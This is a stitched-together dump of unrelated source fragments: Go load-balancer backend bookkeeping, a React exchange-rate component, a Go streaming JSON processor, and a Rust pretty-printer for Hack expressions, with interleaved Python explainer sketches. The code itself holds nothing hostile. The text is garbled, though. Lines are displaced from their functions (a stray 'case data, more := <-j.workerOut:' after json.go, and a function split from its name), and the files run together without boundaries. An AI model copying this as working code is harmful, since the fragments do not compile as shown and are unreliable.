log.WithFields(logrus.Fields{ "restored": restored, "failed": failed, }).Info("Restored services from maps") return nil } func (s *Service) deleteServiceLocked(svc *svcInfo) error { obsoleteBackendIDs := s.deleteBackendsFromCacheLocked(svc) scopedLog := log.WithFields(logrus.Fields{ logfields.ServiceID: svc.frontend.ID, logfields.ServiceIP: svc.frontend.L3n4Addr, logfields.Backends: svc.backends, }) scopedLog.Debug("Deleting service") if err := s.lbmap.DeleteService(svc.frontend, len(svc.backends)); err != nil { return err } delete(s.svcByHash, svc.hash) delete(s.svcByID, svc.frontend.ID) ipv6 := svc.frontend.L3n4Addr.IsIPv6() for _, id := range obsoleteBackendIDs { scopedLog.WithField(logfields.BackendID, id). 
Debug("Deleting obsolete backend") if err := s.lbmap.DeleteBackendByID(uint16(id), ipv6); err != nil { return err } } if err := DeleteID(uint32(svc.frontend.ID)); err != nil { return fmt.Errorf("Unable to release service ID %d: %s", svc.frontend.ID, err) } deleteMetric.Inc() return nil } func (s *Service) updateBackendsCacheLocked(svc *svcInfo, backends []lb.Backend) ( []lb.Backend, []lb.BackendID, error) { obsoleteBackendIDs := []lb.BackendID{} newBackends := []lb.Backend{} backendSet := map[string]struct{}{} for i, backend := range backends { hash := backend.L3n4Addr.Hash() backendSet[hash] = struct{}{} if b, found := svc.backendByHash[hash]; !found { if s.backendRefCount.Add(hash) { id, err := AcquireBackendID(backend.L3n4Addr) if err != nil { return nil, nil, fmt.Errorf("Unable to acquire backend ID for %q: %s", backend.L3n4Addr, err) } backends[i].ID = id newBackends = append(newBackends, backends[i]) // TODO make backendByHash by value not by ref s.backendByHash[hash] = &backends[i] } else { backends[i].ID = s.backendByHash[hash].ID } svc.backendByHash[hash] = &backends[i] } else { backends[i].ID = b.ID } } for hash, backend := range svc.backendByHash { if _, found := backendSet[hash]; !found { if s.backendRefCount.Delete(hash) { DeleteBackendID(backend.ID) delete(s.backendByHash, hash) obsoleteBackendIDs = append(obsoleteBackendIDs, backend.ID) } delete(svc.backendByHash, hash) } } svc.backends = backends return newBackends, obsoleteBackendIDs, nil } func (s *Service) deleteBackendsFromCacheLocked(svc *svcInfo) []lb.BackendID { obsoleteBackendIDs := []lb.BackendID{} for hash, backend := range svc.backendByHash { if s.backendRefCount.Delete(hash) { DeleteBackendID(backend.ID) obsoleteBackendIDs = append(obsoleteBackendIDs, backend.ID) } } return obsoleteBackendIDs }
{ toOpen = append(toOpen, lbmap.Service4MapV2, lbmap.Backend4Map, lbmap.RevNat4Map) if !restore { toDelete = append(toDelete, lbmap.Service4MapV2, lbmap.Backend4Map, lbmap.RevNat4Map) } }
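The backend bookkeeping above hinges on a reference counter: a backend ID is allocated only when the first service references a backend (0 -> 1) and released only when the last reference is dropped (1 -> 0). A small sketch of that rule, written here in Python for brevity rather than Go (RefCounter, acquire, release are invented names mirroring the roles of StringCounter, AcquireBackendID, and DeleteBackendID):

class RefCounter:
    def __init__(self):
        self.counts = {}

    def add(self, key):
        """Return True only on the first reference (0 -> 1)."""
        self.counts[key] = self.counts.get(key, 0) + 1
        return self.counts[key] == 1

    def delete(self, key):
        """Return True only when the last reference is dropped (1 -> 0)."""
        self.counts[key] -= 1
        if self.counts[key] == 0:
            del self.counts[key]
            return True
        return False


refs, ids, next_id = RefCounter(), {}, 1


def acquire(addr_hash):
    global next_id
    if refs.add(addr_hash):          # first service referencing this backend
        ids[addr_hash] = next_id     # allocate a new backend ID
        next_id += 1
    return ids[addr_hash]


def release(addr_hash):
    if refs.delete(addr_hash):       # last service dropped the backend
        ids.pop(addr_hash)           # release the ID


a = acquire("10.0.0.1:80")
b = acquire("10.0.0.1:80")
assert a == b                        # shared backend keeps a single ID
release("10.0.0.1:80")
release("10.0.0.1:80")
assert "10.0.0.1:80" not in ids      # ID released with the last reference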
ExchangeRate.js
import React from 'react'; import PropTypes from 'prop-types'; import Box from '@material-ui/core/Box'; import styled from '@material-ui/core/styles/styled'; import getCurrencySymbol from '../utils/getCurrencySymbol'; import currencies from '../constants/currencies'; const ExchangeRateWrapper = styled(Box)({ display: 'flex', justifyContent: 'center', }); const ExchangeRateContent = styled(Box)({ textAlign: 'center', }); const ExchangeRate = ({ from, to }) => ( <ExchangeRateWrapper mb={3}> <ExchangeRateContent> <Box component="h2">Exchange Rate</Box> <Box component="span"> {getCurrencySymbol(from.currency)} {from.value} = {getCurrencySymbol(to.currency)} {to.value} </Box> </ExchangeRateContent> </ExchangeRateWrapper> ); ExchangeRate.propTypes = { from: PropTypes.shape({
currency: PropTypes.oneOf(currencies), value: PropTypes.number, }), to: PropTypes.shape({ currency: PropTypes.oneOf(currencies), value: PropTypes.number, }), }; ExchangeRate.defaultProps = { from: { currency: 'EUR', value: 1, }, to: { currency: 'GBP', value: 1, }, }; export default ExchangeRate;
json.go
package parse import ( "encoding/json" "github.com/urbint/ingest" "github.com/urbint/ingest/utils" "io" "reflect" "runtime" "strings" "sync" ) type ( // A JSONProcessor is used to process JSON via encoding/json JSONProcessor struct { mapper interface{} newInstance func() reflect.Value logger ingest.Logger workerOut chan interface{} workerWg sync.WaitGroup workerErr chan error workersWorking chan bool workerQuit chan bool opts *JSONOpts sendPtr bool } // JSONOpts are options used to configre a JSONProcessor (and an FFJSONProcessor) JSONOpts struct { AbortOnFailedObject bool Selector string NumDecoders int Logger ingest.Logger } ) // JSON returns an *parse.JSONProcessor which will decode a JSON file to a specified struct func JSON(mapper interface{}, opts ...JSONOpts) *JSONProcessor { opt := defaultJSONOpts() if len(opts) != 0 { utils.Extend(&opt, opts[0]) } indirectType := reflect.Indirect(reflect.ValueOf(mapper)).Type() return &JSONProcessor{ workersWorking: make(chan bool, opt.NumDecoders), workerErr: make(chan error, opt.NumDecoders), workerOut: make(chan interface{}, opt.NumDecoders), workerWg: sync.WaitGroup{}, newInstance: func() reflect.Value { return reflect.New(indirectType) }, mapper: mapper, sendPtr: reflect.TypeOf(mapper).Kind() == reflect.Ptr, logger: opt.Logger, opts: &opt, } } func defaultJSONOpts() JSONOpts { return JSONOpts{ NumDecoders: runtime.NumCPU(), Logger: ingest.DefaultLogger, } } // Name implements ingest.Runner for JSONProcessor func (j *JSONProcessor) Name() string { return "JSON" } // Run implements ingest.Runner for JSONProcessor func (j *JSONProcessor) Run(stage *ingest.Stage) error { j.workerQuit = make(chan bool) j.workerOut = make(chan interface{}, j.opts.NumDecoders) defer func() { close(j.workerQuit) }() in := stage.In for { select { case <-stage.Abort: return nil
if !more { return nil } stage.Out <- data case err := <-j.workerErr: if j.opts.AbortOnFailedObject { return err } log := j.logger.WithError(err) if asUnmarshalTypeErr, isUnmarshalTypeErr := err.(*json.UnmarshalTypeError); isUnmarshalTypeErr { log = log.WithField("offset", asUnmarshalTypeErr.Offset).WithField("value", asUnmarshalTypeErr.Value) } log.Warn("Error unmarshalling JSON record") case input, ok := <-in: if !ok { // Set input to nil to not go in here any more, then wait for all the workers // to finish processing before closing output in = nil go func() { j.workerWg.Wait() close(j.workerOut) }() continue } rc, err := utils.ToIOReadCloser(input) if err != nil { return err } go j.handleIO(rc) } } } func (j *JSONProcessor) handleIO(rc io.ReadCloser) { j.workersWorking <- true j.workerWg.Add(1) go func() { defer func() { rc.Close() j.workerWg.Done() <-j.workersWorking }() decoder := json.NewDecoder(rc) if j.opts.Selector != "" { if err := j.navigateToSelection(decoder); err != nil { j.workerErr <- err return } } for { select { case <-j.workerQuit: return default: if !decoder.More() { return } rec := j.newInstance() if err := decoder.Decode(rec.Interface()); err != nil { if err == io.EOF { return } j.workerErr <- err continue } var toSend interface{} if j.sendPtr { toSend = rec.Interface() } else { toSend = rec.Elem().Interface() } select { case <-j.workerQuit: return case j.workerOut <- toSend: } } } }() } func (j *JSONProcessor) navigateToSelection(decoder *json.Decoder) error { nestIn := strings.Split(j.opts.Selector, ".") for len(nestIn) > 0 { token, err := decoder.Token() if err != nil { return err } if token == nestIn[0] { nestIn = nestIn[1:] continue } else if nestIn[0] == "*" { if delimVal, isDelim := token.(json.Delim); isDelim && json.Delim('[') == delimVal { nestIn = nestIn[1:] } continue } } return nil } // SkipAbortErr saves us having to send nil errors back on abort func (j *JSONProcessor) SkipAbortErr() bool { return true } // SetSelection implements ingest.Selectable for JSONProcessor func (j *JSONProcessor) SetSelection(selection ...string) { if len(selection) > 0 { j.opts.Selector = selection[0] } }
case data, more := <-j.workerOut:
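The Selector option above ("a.*.b"-style paths) tells the decoder how deep to descend into the document before it starts emitting records. A simplified, non-streaming Python analogue of that navigation over an already-parsed document, where "*" descends into every array element (select is an invented name, not the Go API):

import json


def select(doc, selector):
    """Return every value reached by following the dotted selector."""
    nodes = [doc]
    for part in selector.split("."):
        next_nodes = []
        for node in nodes:
            if part == "*" and isinstance(node, list):
                next_nodes.extend(node)        # descend into every element
            elif isinstance(node, dict) and part in node:
                next_nodes.append(node[part])  # descend into the named key
        nodes = next_nodes
    return nodes


doc = json.loads('{"data": {"items": [{"id": 1}, {"id": 2}]}}')
print(select(doc, "data.items.*"))  # -> [{'id': 1}, {'id': 2}]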
print.rs
// Copyright (c) Facebook, Inc. and its affiliates. // // This source code is licensed under the MIT license found in the // LICENSE file in the "hack" directory of this source tree. use crate::{ context::Context, write::{self, Error}, }; use bstr::{BString, ByteSlice}; use core_utils_rust::add_ns; use error::ErrorKind; use hhbc::{hhas_body::HhasBodyEnv, ClassName}; use hhbc_string_utils::{ integer, is_class, is_parent, is_self, is_static, is_xhp, lstrip, lstrip_bslice, mangle, strip_global_ns, strip_ns, types, }; use lazy_static::lazy_static; use naming_special_names_rust::classes; use oxidized::{ ast, ast_defs::{self, ParamKind}, local_id, }; use regex::Regex; use std::{ borrow::Cow, io::{Result, Write}, write, }; use write_bytes::write_bytes; pub struct ExprEnv<'arena, 'e> { pub codegen_env: Option<&'e HhasBodyEnv<'arena>>, } fn print_key_value( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, k: &ast::Expr, v: &ast::Expr, ) -> Result<()> { print_key_value_(ctx, w, env, k, print_expr, v) } fn print_key_value_<K, KeyPrinter>( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, k: K, mut kp: KeyPrinter, v: &ast::Expr, ) -> Result<()> where KeyPrinter: FnMut(&Context<'_>, &mut dyn Write, &ExprEnv<'_, '_>, K) -> Result<()>, { kp(ctx, w, env, k)?; w.write_all(b" => ")?; print_expr(ctx, w, env, v) } fn print_afield( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, afield: &ast::Afield, ) -> Result<()> { use ast::Afield as A; match afield { A::AFvalue(e) => print_expr(ctx, w, env, e), A::AFkvalue(k, v) => print_key_value(ctx, w, env, k, v), } } fn print_afields( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, afields: impl AsRef<[ast::Afield]>, ) -> Result<()> { write::concat_by(w, ", ", afields, |w, i| print_afield(ctx, w, env, i)) } fn print_uop(w: &mut dyn Write, op: ast::Uop) -> Result<()> { use ast::Uop as U; w.write_all(match op { U::Utild => b"~", U::Unot => b"!", U::Uplus => b"+", U::Uminus => b"-", U::Uincr => b"++", U::Udecr => b"--", U::Usilence => b"@", U::Upincr | U::Updecr => { return Err(Error::fail("string_of_uop - should have been captures earlier").into()); } }) } fn print_key_values_<K, KeyPrinter>( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, mut kp: KeyPrinter, kvs: impl AsRef<[(K, ast::Expr)]>, ) -> Result<()> where KeyPrinter: Fn(&Context<'_>, &mut dyn Write, &ExprEnv<'_, '_>, &K) -> Result<()>, { write::concat_by(w, ", ", kvs, |w, (k, v)| { print_key_value_(ctx, w, env, k, &mut kp, v) }) } fn print_expr_darray<K, KeyPrinter>( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, kp: KeyPrinter, kvs: impl AsRef<[(K, ast::Expr)]>, ) -> Result<()> where KeyPrinter: Fn(&Context<'_>, &mut dyn Write, &ExprEnv<'_, '_>, &K) -> Result<()>, { write::wrap_by_(w, "darray[", "]", |w| { print_key_values_(ctx, w, env, kp, kvs) }) } fn print_expr_varray( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, varray: &[ast::Expr], ) -> Result<()> { write::wrap_by_(w, "varray[", "]", |w| { write::concat_by(w, ", ", varray, |w, e| print_expr(ctx, w, env, e)) }) } fn print_shape_field_name( _: &Context<'_>, w: &mut dyn Write, _: &ExprEnv<'_, '_>, field: &ast::ShapeFieldName, ) -> Result<()> { use ast::ShapeFieldName as S; match field { S::SFlitInt((_, s)) => print_expr_int(w, s.as_ref()), S::SFlitStr((_, s)) => print_expr_string(w, s), S::SFclassConst(_, (_, s)) => print_expr_string(w, s.as_bytes()), } } fn print_expr_int(w: &mut dyn Write, i: &str) -> Result<()> { match integer::to_decimal(i) { Ok(s) => 
w.write_all(s.as_bytes()), Err(_) => Err(Error::fail("ParseIntError").into()), } } fn print_expr_string(w: &mut dyn Write, s: &[u8]) -> Result<()> { fn escape_char(c: u8) -> Option<Cow<'static, [u8]>> { match c { b'\n' => Some((&b"\\\\n"[..]).into()), b'\r' => Some((&b"\\\\r"[..]).into()), b'\t' => Some((&b"\\\\t"[..]).into()), b'\\' => Some((&b"\\\\\\\\"[..]).into()), b'"' => Some((&b"\\\\\\\""[..]).into()), b'$' => Some((&b"\\\\$"[..]).into()), c if escaper::is_lit_printable(c) => None, c => { let mut r = vec![]; write!(r, "\\\\{:03o}", c).unwrap(); Some(r.into()) } } } write::wrap_by(w, "\\\"", |w| { w.write_all(&escaper::escape_bstr_by(s.as_bstr().into(), escape_char)) }) } fn print_expr_to_string( ctx: &Context<'_>, env: &ExprEnv<'_, '_>, expr: &ast::Expr, ) -> Result<BString> { let mut buf = Vec::new(); print_expr(ctx, &mut buf, env, expr).map_err(|e| match write::into_error(e) { Error::NotImpl(m) => Error::NotImpl(m), e => Error::Fail(format!("Failed: {}", e)), })?; Ok(buf.into()) } fn print_expr( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, ast::Expr(_, _, expr): &ast::Expr, ) -> Result<()> { fn adjust_id<'a>(env: &ExprEnv<'_, '_>, id: &'a str) -> Cow<'a, str> { let s: Cow<'a, str> = match env.codegen_env { Some(env) => { if env.is_namespaced && id .as_bytes() .iter() .rposition(|c| *c == b'\\') .map_or(true, |i| i < 1) { strip_global_ns(id).into() } else { add_ns(id) } } _ => id.into(), }; escaper::escape(s) } fn print_expr_id<'a>(w: &mut dyn Write, env: &ExprEnv<'_, '_>, s: &'a str) -> Result<()> { w.write_all(adjust_id(env, s).as_bytes()) } fn fmt_class_name<'a>(is_class_constant: bool, id: Cow<'a, str>) -> Cow<'a, str> { let cn: Cow<'a, str> = if is_xhp(strip_global_ns(&id)) { escaper::escape(strip_global_ns(&mangle(id.into()))) .to_string() .into() } else { escaper::escape(strip_global_ns(&id)).to_string().into() }; if is_class_constant { format!("\\\\{}", cn).into() } else { cn } } fn get_class_name_from_id<'e>( ctx: &Context<'_>, env: Option<&'e HhasBodyEnv<'_>>, should_format: bool, is_class_constant: bool, id: &'e str, ) -> Cow<'e, str> { if id == classes::SELF || id == classes::PARENT || id == classes::STATIC { let name = ctx.special_class_resolver.resolve(env, id); return fmt_class_name(is_class_constant, name); } fn get<'a>(should_format: bool, is_class_constant: bool, id: &'a str) -> Cow<'a, str> { if should_format { fmt_class_name(is_class_constant, id.into()) } else { id.into() } } if env.is_some() { let alloc = bumpalo::Bump::new(); let class_id = ClassName::from_ast_name_and_mangle(&alloc, id); let id = class_id.unsafe_as_str(); get(should_format, is_class_constant, id) .into_owned() .into() } else { get(should_format, is_class_constant, id) } } fn handle_possible_colon_colon_class_expr( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, is_array_get: bool, e_: &ast::Expr_, ) -> Result<Option<()>> { match e_.as_class_const() { Some(( ast::ClassId(_, _, ast::ClassId_::CIexpr(ast::Expr(_, _, ast::Expr_::Id(id)))), (_, s2), )) if is_class(&s2) && !(is_self(&id.1) || is_parent(&id.1) || is_static(&id.1)) => { Ok(Some({ let s1 = get_class_name_from_id(ctx, env.codegen_env, false, false, &id.1); if is_array_get { print_expr_id(w, env, s1.as_ref())? } else { print_expr_string(w, s1.as_bytes())? 
} })) } _ => Ok(None), } } use ast::Expr_; match expr { Expr_::Id(id) => print_expr_id(w, env, id.1.as_ref()), Expr_::Lvar(lid) => w.write_all(escaper::escape(&(lid.1).1).as_bytes()), Expr_::Float(f) => { if f.contains('E') || f.contains('e') { let s = format!( "{:.1E}", f.parse::<f64>() .map_err(|_| Error::fail(format!("ParseFloatError: {}", f)))? ) // to_uppercase() here because s might be "inf" or "nan" .to_uppercase(); lazy_static! { static ref UNSIGNED_EXP: Regex = Regex::new(r"(?P<first>E)(?P<second>\d+)").unwrap(); static ref SIGNED_SINGLE_DIGIT_EXP: Regex = Regex::new(r"(?P<first>E[+-])(?P<second>\d$)").unwrap(); } // turn mEn into mE+n let s = UNSIGNED_EXP.replace(&s, "${first}+${second}"); // turn mE+n or mE-n into mE+0n or mE-0n (where n is a single digit) let s = SIGNED_SINGLE_DIGIT_EXP.replace(&s, "${first}0${second}"); w.write_all(s.as_bytes()) } else { w.write_all(f.as_bytes()) } } Expr_::Int(i) => print_expr_int(w, i.as_ref()), Expr_::String(s) => print_expr_string(w, s), Expr_::Null => w.write_all(b"NULL"), Expr_::True => w.write_all(b"true"), Expr_::False => w.write_all(b"false"), // For arrays and collections, we are making a conscious decision to not // match HHMV has HHVM's emitter has inconsistencies in the pretty printer // https://fburl.com/tzom2qoe Expr_::Collection(c) if (c.0).1 == "vec" || (c.0).1 == "dict" || (c.0).1 == "keyset" => { w.write_all((c.0).1.as_bytes())?; write::square(w, |w| print_afields(ctx, w, env, &c.2)) } Expr_::Collection(c) => { let name = strip_ns((c.0).1.as_str()); let name = types::fix_casing(name); match name { "Set" | "Pair" | "Vector" | "Map" | "ImmSet" | "ImmVector" | "ImmMap" => { w.write_all(b"HH\\\\")?; w.write_all(name.as_bytes())?; write::wrap_by_(w, " {", "}", |w| { Ok(if !c.2.is_empty() { w.write_all(b" ")?; print_afields(ctx, w, env, &c.2)?; w.write_all(b" ")?; }) }) } _ => Err( Error::fail(format!("Default value for an unknow collection - {}", name)) .into(), ), } } Expr_::Shape(fl) => print_expr_darray(ctx, w, env, print_shape_field_name, fl), Expr_::Binop(x) => { let (bop, e1, e2) = &**x; print_expr(ctx, w, env, e1)?; w.write_all(b" ")?; print_bop(w, bop)?; w.write_all(b" ")?; print_expr(ctx, w, env, e2) } Expr_::Call(c) => { let (e, _, es, unpacked_element) = &**c; match e.as_id() { Some(ast_defs::Id(_, call_id)) => { w.write_all(lstrip(adjust_id(env, call_id).as_ref(), "\\\\").as_bytes())? } None => { let buf = print_expr_to_string(ctx, env, e)?; w.write_all(lstrip_bslice(&buf, br"\\"))? } }; write::paren(w, |w| { write::concat_by(w, ", ", &es, |w, (pk, e)| match pk { ParamKind::Pnormal => print_expr(ctx, w, env, e), ParamKind::Pinout(_) => Err(Error::fail("illegal default value").into()), })?; match unpacked_element { None => Ok(()), Some(e) => { if !es.is_empty() { w.write_all(b", ")?; } // TODO: Should probably have ... also but we are not doing that in ocaml print_expr(ctx, w, env, e) } } }) } Expr_::New(x) => { let (cid, _, es, unpacked_element, _) = &**x; match cid.2.as_ciexpr() { Some(ci_expr) => { w.write_all(b"new ")?; match ci_expr.2.as_id() { Some(ast_defs::Id(_, cname)) => w.write_all( lstrip( &adjust_id( env, ClassName::from_ast_name_and_mangle( &bumpalo::Bump::new(), cname, ) .unsafe_as_str(), ), "\\\\", ) .as_bytes(), )?, None => { let buf = print_expr_to_string(ctx, env, ci_expr)?; w.write_all(lstrip_bslice(&buf, br"\\"))? 
} } write::paren(w, |w| { write::concat_by(w, ", ", es, |w, e| print_expr(ctx, w, env, e))?; match unpacked_element { None => Ok(()), Some(e) => { w.write_all(b", ")?; print_expr(ctx, w, env, e) } } }) } None => { match cid.2.as_ci() { Some(id) => { // Xml exprs rewritten as New exprs come // through here. print_xml(ctx, w, env, &id.1, es) } None => Err(Error::NotImpl(format!("{}:{}", file!(), line!())).into()), } } } } Expr_::ClassGet(cg) => { match &(cg.0).2 { ast::ClassId_::CIexpr(e) => match e.as_id() { Some(id) => w.write_all( get_class_name_from_id( ctx, env.codegen_env, true, /* should_format */ false, /* is_class_constant */ &id.1, ) .as_bytes(), )?, _ => print_expr(ctx, w, env, e)?, }, _ => return Err(Error::fail("TODO Unimplemented unexpected non-CIexpr").into()), } w.write_all(b"::")?; match &cg.1 { ast::ClassGetExpr::CGstring((_, litstr)) => { w.write_all(escaper::escape(litstr).as_bytes()) } ast::ClassGetExpr::CGexpr(e) => print_expr(ctx, w, env, e), } } Expr_::ClassConst(cc) => { if let Some(e1) = (cc.0).2.as_ciexpr() { handle_possible_colon_colon_class_expr(ctx, w, env, false, expr)?.map_or_else( || { let s2 = &(cc.1).1; match e1.2.as_id() { Some(ast_defs::Id(_, s1)) => { let s1 = get_class_name_from_id(ctx, env.codegen_env, true, true, s1); write::concat_str_by(w, "::", [&s1.into(), s2]) } _ => { print_expr(ctx, w, env, e1)?; w.write_all(b"::")?; w.write_all(s2.as_bytes()) } } }, Ok, ) } else { Err(Error::fail("TODO: Only expected CIexpr in class_const").into()) } } Expr_::Unop(u) => match u.0 { ast::Uop::Upincr => { print_expr(ctx, w, env, &u.1)?; w.write_all(b"++") } ast::Uop::Updecr => { print_expr(ctx, w, env, &u.1)?; w.write_all(b"--") } _ => { print_uop(w, u.0)?; print_expr(ctx, w, env, &u.1) } }, Expr_::ObjGet(og) => { print_expr(ctx, w, env, &og.0)?; w.write_all(match og.2 { ast::OgNullFlavor::OGNullthrows => b"->", ast::OgNullFlavor::OGNullsafe => b"?->", })?; print_expr(ctx, w, env, &og.1) } Expr_::Clone(e) => { w.write_all(b"clone ")?; print_expr(ctx, w, env, e) } Expr_::ArrayGet(ag) => { print_expr(ctx, w, env, &ag.0)?; write::square(w, |w| { write::option(w, &ag.1, |w, e: &ast::Expr| { handle_possible_colon_colon_class_expr(ctx, w, env, true, &e.2) .transpose() .unwrap_or_else(|| print_expr(ctx, w, env, e)) }) }) } Expr_::String2(ss) => write::concat_by(w, " . ", ss, |w, s| print_expr(ctx, w, env, s)), Expr_::PrefixedString(s) => { w.write_all(s.0.as_bytes())?; w.write_all(b" . ")?; print_expr(ctx, w, env, &s.1) } Expr_::Eif(eif) => { print_expr(ctx, w, env, &eif.0)?; w.write_all(b" ? ")?; write::option(w, &eif.1, |w, etrue| print_expr(ctx, w, env, etrue))?; w.write_all(b" : ")?; print_expr(ctx, w, env, &eif.2) } Expr_::Cast(c) => { write::paren(w, |w| print_hint(w, false, &c.0))?; print_expr(ctx, w, env, &c.1) } Expr_::Pipe(p) => { print_expr(ctx, w, env, &p.1)?; w.write_all(b" |> ")?; print_expr(ctx, w, env, &p.2) } Expr_::Is(i) => { print_expr(ctx, w, env, &i.0)?; w.write_all(b" is ")?; print_hint(w, true, &i.1) } Expr_::As(a) => { print_expr(ctx, w, env, &a.0)?; w.write_all(if a.2 { b" ?as " } else { b" as " })?; print_hint(w, true, &a.1) } Expr_::Varray(va) => print_expr_varray(ctx, w, env, &va.1), Expr_::Darray(da) => print_expr_darray(ctx, w, env, print_expr, &da.1), Expr_::Tuple(t) => write::wrap_by_(w, "varray[", "]", |w| { // A tuple is represented by a varray when using reflection. 
write::concat_by(w, ", ", t, |w, i| print_expr(ctx, w, env, i)) }), Expr_::List(l) => write::wrap_by_(w, "list(", ")", |w| { write::concat_by(w, ", ", l, |w, i| print_expr(ctx, w, env, i)) }), Expr_::Yield(y) => { w.write_all(b"yield ")?; print_afield(ctx, w, env, y) } Expr_::Await(e) => { w.write_all(b"await ")?; print_expr(ctx, w, env, e) } Expr_::Import(i) => { print_import_flavor(w, &i.0)?; w.write_all(b" ")?; print_expr(ctx, w, env, &i.1) } Expr_::Xml(_) => { Err(Error::fail("expected Xml to be converted to New during rewriting").into()) } Expr_::Efun(f) => print_efun(ctx, w, env, &f.0, &f.1), Expr_::FunctionPointer(fp) => { let (fp_id, targs) = &**fp; match fp_id { ast::FunctionPtrId::FPId(ast::Id(_, sid)) => { w.write_all(lstrip(adjust_id(env, sid).as_ref(), "\\\\").as_bytes())? } ast::FunctionPtrId::FPClassConst(ast::ClassId(_, _, class_id), (_, meth_name)) => { match class_id { ast::ClassId_::CIexpr(e) => match e.as_id() { Some(id) => w.write_all( get_class_name_from_id( ctx, env.codegen_env, true, /* should_format */ false, /* is_class_constant */ &id.1, ) .as_bytes(), )?, _ => print_expr(ctx, w, env, e)?, }, _ => { return Err(Error::fail( "TODO Unimplemented unexpected non-CIexpr in function pointer", ) .into()); } } w.write_all(b"::")?; w.write_all(meth_name.as_bytes())? } }; write::wrap_by_(w, "<", ">", |w| { write::concat_by(w, ", ", targs, |w, _targ| w.write_all(b"_")) }) } Expr_::Omitted => Ok(()), Expr_::Lfun(lfun) => { if ctx.dump_lambdas { let fun_ = &lfun.0; write::paren(w, |w| { write::paren(w, |w| { write::concat_by(w, ", ", &fun_.params, |w, param| { print_fparam(ctx, w, env, param) }) })?; w.write_all(b" ==> ")?; print_block_(ctx, w, env, &fun_.body.fb_ast) }) } else { Err(Error::fail( "expected Lfun to be converted to Efun during closure conversion print_expr", ) .into()) } } Expr_::ETSplice(splice) => { w.write_all(b"${")?; print_expr(ctx, w, env, splice)?; w.write_all(b"}") } Expr_::EnumClassLabel(ecl) => match &ecl.0 { Some(ast_defs::Id(_, s1)) => { let s1 = get_class_name_from_id(ctx, env.codegen_env, true, true, s1); write::concat_str_by(w, "#", [&s1.into(), &ecl.1]) } None => { w.write_all(b"#")?; w.write_all(ecl.1.as_bytes()) } }, Expr_::Dollardollar(_) | Expr_::ExpressionTree(_) | Expr_::FunId(_) | Expr_::Hole(_) | Expr_::KeyValCollection(_) | Expr_::Lplaceholder(_) | Expr_::MethodCaller(_) | Expr_::MethodId(_) | Expr_::Pair(_) | Expr_::ReadonlyExpr(_) | Expr_::SmethodId(_) | Expr_::This | Expr_::Upcast(_) | Expr_::ValCollection(_) => { todo!("T117477443: Unimplemented: Cannot print: {:?}", expr) } } } fn
( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, id: &str, es: &[ast::Expr], ) -> Result<()> { use ast::{Expr, Expr_}; fn syntax_error() -> Error { Error::NotImpl(String::from("print_xml: unexpected syntax")) } fn print_xhp_attr( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, attr: &(ast_defs::ShapeFieldName, ast::Expr), ) -> Result<()> { match attr { (ast_defs::ShapeFieldName::SFlitStr(s), e) => print_key_value_( ctx, w, env, &s.1, |_, w, _, k| print_expr_string(w, k.as_slice()), e, ), _ => Err(syntax_error().into()), } } let (attrs, children) = if es.len() < 2 { return Err(syntax_error().into()); } else { match (&es[0], &es[1]) { (Expr(_, _, Expr_::Shape(attrs)), Expr(_, _, Expr_::Varray(children))) => { (attrs, &children.1) } _ => return Err(syntax_error().into()), } }; let env = ExprEnv { codegen_env: env.codegen_env, }; write!(w, "new {}", mangle(id.into()))?; write::paren(w, |w| { write::wrap_by_(w, "darray[", "]", |w| { write::concat_by(w, ", ", attrs, |w, attr| print_xhp_attr(ctx, w, &env, attr)) })?; w.write_all(b", ")?; print_expr_varray(ctx, w, &env, children)?; w.write_all(b", __FILE__, __LINE__") }) } fn print_efun( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, f: &ast::Fun_, use_list: &[ast::Lid], ) -> Result<()> { if f.fun_kind.is_fasync() || f.fun_kind.is_fasync_generator() { write!(w, "async ",)?; } w.write_all(b"function ")?; write::paren(w, |w| { write::concat_by(w, ", ", &f.params, |w, p| print_fparam(ctx, w, env, p)) })?; w.write_all(b" ")?; if !use_list.is_empty() { w.write_all(b"use ")?; write::paren(w, |w| { write::concat_by(w, ", ", use_list, |w: &mut dyn Write, ast::Lid(_, id)| { w.write_all(local_id::get_name(id).as_bytes()) }) })?; w.write_all(b" ")?; } print_block_(ctx, w, env, &f.body.fb_ast) } fn print_block( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, block: &[ast::Stmt], ) -> Result<()> { match block { [] | [ast::Stmt(_, ast::Stmt_::Noop)] => Ok(()), [ast::Stmt(_, ast::Stmt_::Block(b))] if b.len() == 1 => print_block_(ctx, w, env, b), [_, _, ..] 
=> print_block_(ctx, w, env, block), [stmt] => print_statement(ctx, w, env, stmt), } } fn print_block_( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, block: &[ast::Stmt], ) -> Result<()> { write::wrap_by_(w, "{\\n", "}\\n", |w| { write::concat(w, block, |w, stmt| { if !matches!(stmt.1, ast::Stmt_::Noop) { w.write_all(b" ")?; print_statement(ctx, w, env, stmt)?; } Ok(()) }) }) } fn print_statement( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, stmt: &ast::Stmt, ) -> Result<()> { use ast::Stmt_ as S_; match &stmt.1 { S_::Return(expr) => write::wrap_by_(w, "return", ";\\n", |w| { write::option(w, &**expr, |w, e| { w.write_all(b" ")?; print_expr(ctx, w, env, e) }) }), S_::Expr(expr) => { print_expr(ctx, w, env, &**expr)?; w.write_all(b";\\n") } S_::Throw(expr) => { write::wrap_by_(w, "throw ", ";\\n", |w| print_expr(ctx, w, env, &**expr)) } S_::Break => w.write_all(b"break;\\n"), S_::Continue => w.write_all(b"continue;\\n"), S_::While(x) => { let (cond, block) = &**x; write::wrap_by_(w, "while (", ") ", |w| print_expr(ctx, w, env, cond))?; 